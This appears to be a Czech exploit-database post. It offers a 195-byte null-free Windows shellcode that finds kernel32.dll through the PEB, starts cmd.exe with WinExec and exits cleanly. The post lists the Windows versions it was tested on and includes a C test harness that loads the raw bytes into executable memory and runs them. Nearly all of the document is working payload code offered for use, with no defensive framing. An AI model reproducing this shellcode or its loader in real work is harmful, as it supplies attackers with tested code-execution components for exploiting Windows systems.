Allwin shellcode, který pomocí WinExec spustí cmd.exe a regulérně se ukončí pomocí ExitProcess. Shellcode neobsahuje NULL byty. Využívá PEB strukturu k nalezení kernel32.dll v paměti procesu. Kód byl úspěšně testován na:
Win XP SP2 ENG
Win XP SP2 CZ
Win XP SP3 CZ
Win Vista (32bit)/(64bit)
Win 2000
Win 2003
Win 7 (32bit)/(64bit)
Win 2k8 (32bit)

Velikost: 195 bajtů.

#include <stdio.h>
#include <windows.h>
 
int main(){
  unsigned char shellcode[]=
  "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
  "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
  "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
  "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
  "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
  "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
  "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
  "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
  "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
  "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
  "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
  "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
  "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE"
  "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53"
  "\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24"
  "\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51"
  "\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE"
  "\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45"
  "\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54"
  "\x24\x20\x57\xFF\xD0";
 
   LPVOID lpAlloc;
  void (*opcode)();
 
  printf("Size = %d\n", lstrlen(shellcode));
  system("PAUSE");
 
  lpAlloc = VirtualAlloc(0, 4096,
              MEM_COMMIT,
              PAGE_EXECUTE_READWRITE);
 
  if(lpAlloc == NULL){
    printf("Memory not allocated!\n");
    return 0;
  }
 
  memcpy(lpAlloc, shellcode, sizeof(shellcode));
 
  opcode = lpAlloc;
 
  opcode();
 
  return 0;
}